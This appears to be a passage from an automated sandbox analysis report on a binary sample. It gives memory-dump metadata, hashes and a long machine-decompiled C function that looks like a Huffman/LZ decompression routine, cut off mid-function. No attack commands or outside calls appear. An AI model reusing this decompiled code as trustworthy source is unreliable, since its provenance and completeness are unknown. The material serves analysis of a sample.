0x001a5fe1
0x001a5fe4
0x001a5fe7
0x001a5fea
0x001a5fed
0x00000000
0x00000000
0x001a5ff3
0x001a5ff6
0x001a589e
0x001a589e
0x001a589e
0x001a589e
0x00000000
0x001a589e
0x001a589e
0x001a5f54
0x001a5f56
0x001a5f56
0x001a5f59
0x001a5f5d
0x001a5f5f
0x001a5f5f
0x001a5f63
0x001a5f68
0x001a5f6b
0x001a5f6e
0x001a5f71
0x001a5f74
0x001a5f74
0x001a5f74
0x001a5f79
0x001a5f79
0x00000000
0x001a5f79
0x001a5f07
0x001a5f09
0x001a5f0a
0x001a5f0c
0x00000000
0x00000000
0x001a5f0e
0x001a5f10
0x001a5f10
0x001a5f13
0x001a5f13
0x001a5f15
0x001a5f17
0x001a5f1d
0x001a5f23
0x001a5f29
0x001a5f2f
0x001a5f35
0x001a5f3b
0x001a5f3e
0x001a5f41
0x001a5f43
0x001a5f46
0x001a5f48
0x001a5f48
0x001a5f48
0x00000000
0x001a5f4d
0x001a5ebb
0x001a5ebb
0x001a5ec4
0x001a5ec5
0x00000000
0x001a5ec5
0x001a5e73
0x001a5e7a
0x001a5e7f
0x001a5e7f
0x00000000
0x001a589e
0x001a6159
0x001a60af
0x001a60b5
0x001a60b8
0x001a60b8
0x001a60b8
0x001a60ba
0x00000000
0x00000000
0x001a60bc
0x001a60bc
0x001a60bd
0x001a60c0
0x001a60c3
0x00000000
0x00000000
0x001a60c5
0x00000000
0x001a60c5
0x001a60c7
0x001a60c7
0x00000000
0x001a60c7
0x001a607d
0x001a607f
0x001a6082
0x001a608c
0x001a6094
0x001a609a
0x001a609d
0x00000000
0x00000000
0x00000000
0x00000000
0x001a604f
0x001a604f
0x001a6052
0x001a6054
0x001a6057
0x001a6057
0x001a6057
0x00000000
0x001a604f
0x001a5ea4
0x001a5ea4
0x001a5ea7
0x001a5eaa
0x001a5eaa
0x001a5e62
0x001a5e68
0x001a5e6a
0x001a5e6f
0x001a5e71
0x00000000
0x00000000
0x00000000
0x001a5e71
0x001a5a64
0x001a5a64
0x001a5a6a
0x001a5a6d
0x001a5a7e
0x001a5a81
0x001a5a81
0x001a5a6f
0x001a5a6f
0x001a5a6f
0x001a5a83
0x001a5a86
0x001a5a88
0x001a5a8c
0x001a5a93
0x001a5a9b
0x001a5a9d
0x001a5aa4
0x001a5aa7
0x001a5aa7
0x001a5aaa
0x001a5aaa
0x001a5aaf
0x001a5ab6
0x001a5abc
0x001a5ac2
0x001a5ac9
0x001a5af5
0x001a5af7
0x001a5af8
0x001a5af9
0x001a5afb
0x001a5b17
0x001a5b1a
0x001a5b21
0x001a5b24
0x001a5b27
0x001a5b33
0x001a5b3f
0x001a5b41
0x001a5b47
0x001a5b49
0x001a5b49
0x001a5b4b
0x00000000
0x001a5b4b
0x001a5afd
0x001a5b03
0x001a5b06
0x001a5b06
0x001a5b06
0x001a5b08
0x00000000
0x00000000
0x001a5b0a
0x001a5b0a
0x001a5b0b
0x001a5b0e
0x001a5b11
0x00000000
0x00000000
0x001a5b13
0x00000000
0x001a5b13
0x001a5b15
0x001a5b15
0x00000000
0x001a5acb
0x001a5acb
0x001a5acd
0x001a5ad0
0x001a5ada
0x001a5ae2
0x001a5ae8
0x001a5aeb
0x001a5b53
0x001a5b53
0x001a5b56
0x001a5b59
0x001a5b69
0x001a5b6c
0x001a5b6c
0x001a5b5b
0x001a5b5b
0x001a5b5b
0x001a5b6e
0x001a5b6f
0x001a5b73
0x001a5b75
0x001a5b79
0x001a5b7b
0x001a5c6f
0x001a5c6f
0x00000000
0x001a5b81
0x001a5b81
0x001a5b81
0x001a5b84
0x001a5cca
0x001a5ccd
0x001a5cd6
0x001a5cde
0x001a5ce2
0x001a5ce6
0x001a5ced
0x001a5cf0
0x001a5cf6
0x001a5c72
0x001a5c72
0x001a5c78
0x001a5c7a
0x001a5c7b
0x001a5c81
0x001a5c83
0x001a5c84
0x001a5c8a
0x001a5c8c
0x001a5c8c
0x001a5c8c
0x001a5c8a
0x001a5c81
0x001a5c90
0x001a5c96
0x001a5c9c
0x001a5c9f
0x001a5ca2
0x001a5ca9
0x001a5cac
0x001a5cfe
0x001a5d04
0x001a5d07
0x001a5d09
0x001a5d10
0x001a5d12
0x001a5d14
0x001a5e20
0x001a5e20
0x001a5e22
0x00000000
0x00000000
0x001a5e28
0x001a5e28
0x001a5e2e
0x001a5e2e
0x001a5e34
0x001a5e39
0x001a5e3d
0x001a5e40
0x001a5e45
0x001a5e4e
0x001a5e50
0x001a5e50
0x001a5e50
0x00000000
0x001a5e55
0x001a5d1a
0x001a5d1a
0x001a5d1c
0x00000000
0x00000000
0x001a5d22
0x001a5d22
0x001a5d28
0x001a5d2b
0x001a5d31
0x001a5d33
0x001a5d37
0x001a5d82
0x001a5d82
0x001a5d85
0x001a5db4
0x001a5db4
0x001a5db6
0x001a5dbe
0x001a5dc1
0x001a5dc4
0x001a5dcd
0x001a5dd0
0x001a5dd3
0x001a5ddc
0x001a5ddf
0x001a5de2
0x001a5deb
0x001a5dee
0x001a5df1
0x001a5dfa
0x001a5dfd
0x001a5e00
0x001a5e09
0x001a5e0c
0x001a5e0f
0x001a5e18
0x001a5e18
0x001a5e0f
0x001a5e00
0x001a5df1
0x001a5de2
0x001a5dd3
0x001a5dc4
0x00000000
0x001a5db6
0x001a5d87
0x001a5d89
0x001a5d89
0x001a5d8c
0x001a5d90
0x001a5d92
0x001a5d92
0x001a5d96
0x001a5d9b
0x001a5d9e
0x001a5da1
0x001a5da4
0x001a5da7
0x001a5da7
0x001a5da7
0x001a5dac
0x001a5db0
0x00000000
0x001a5db0
0x001a5d39
0x001a5d39
0x001a5d3c
0x00000000
0x00000000
0x001a5d3e
0x001a5d40
0x001a5d40
0x001a5d43
0x001a5d43
0x001a5d45
0x001a5d48
0x001a5d4e
0x001a5d54
0x001a5d5a
0x001a5d60
0x001a5d66
0x001a5d6c
0x001a5d6f
0x001a5d72
0x001a5d75
0x001a5d78
0x001a5d7b
0x001a5d7b
0x001a5d7b
0x00000000
0x001a5cae
0x001a5cae
0x001a5cae
0x001a5cb7
0x001a5cb8
0x00000000
0x001a5cb8
0x001a5cac
0x001a5b8a
0x001a5b8a
0x001a5bbd
0x001a5b8c
0x001a5b8f
0x001a5b98
0x001a5ba0
0x001a5ba3
0x001a5bab
0x001a5bb2
0x001a5bb8
0x001a5bb8
0x001a5bc2
0x001a5bc9
0x001a5bcf
0x001a5bd5
0x001a5bdc
0x001a5c08
0x001a5c0a
0x001a5c0b
0x001a5c0c
0x001a5c0e
0x001a5c2a
0x001a5c2d
0x001a5c34
0x001a5c37
0x001a5c3a
0x001a5c46
0x001a5c52
0x001a5c54
0x001a5c5a
0x001a5c5c
0x001a5c5c
0x001a5c5e
0x00000000
0x001a5c5e
0x001a5c10
0x001a5c16
0x001a5c19
0x001a5c19
0x001a5c19
0x001a5c1b
0x00000000
0x00000000
0x001a5c1d
0x001a5c1d
0x001a5c1e
0x001a5c21
0x001a5c24
0x00000000
0x00000000
0x001a5c26
0x00000000
0x001a5c26
0x001a5c28
0x001a5c28
0x00000000
0x001a5bde
0x001a5bde
0x001a5be0
0x001a5be3
0x001a5bed
0x001a5bf5
0x001a5bfb
0x001a5bfe
0x001a5c66
0x001a5c69
0x001a5c69
0x001a5c6b
0x00000000
0x001a5c6b
0x001a5bdc
0x001a5b7b
0x001a5ac9
0x001a5a1e
0x001a5a1e
0x001a5a25
0x001a5a43
0x001a5a49
0x001a5a4e
0x001a5a51
0x00000000
0x001a5a51
0x001a5a27
0x001a5a34
0x001a5a3c
0x00000000
0x001a5a3c
0x001a598f
0x001a5935
0x001a5935
0x001a5937
0x00000000
0x00000000
0x001a5939
0x001a593b
0x001a5940
0x001a5946
0x001a594c
0x00000000
0x00000000
0x001a5952
0x001a5952
0x001a5966
0x001a5966
0x001a596d
0x001a6261
0x001a6261
0x00000000
0x001a6261
0x00000000
0x001a596d
0x001a5954
0x001a5954
0x001a595a
0x001a5960
0x00000000
0x00000000
0x00000000
0x001a5960
0x001a58a1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
Instruction ID: 880f5d2a7f2574217815e33bd0c0e45516a01a8a1e2d7810b74821c5dfab733e
Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
Instruction Fuzzy Hash: A9623E75608B849FCB29CF74C8906B9BBE2AF96304F09855ED8EB8B346D734E945C710

Uniqueness

Uniqueness Score: -1.00%

Function 001A6CDB, Relevance: .8, Instructions: 773
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001A6CDB(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E0019A4ED(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E0019A4ED(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E0019A4ED(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E001AEA80(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E001AEA80(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E001A3564(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E001A1A0E(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E0019A4ED(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E0019A4ED(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
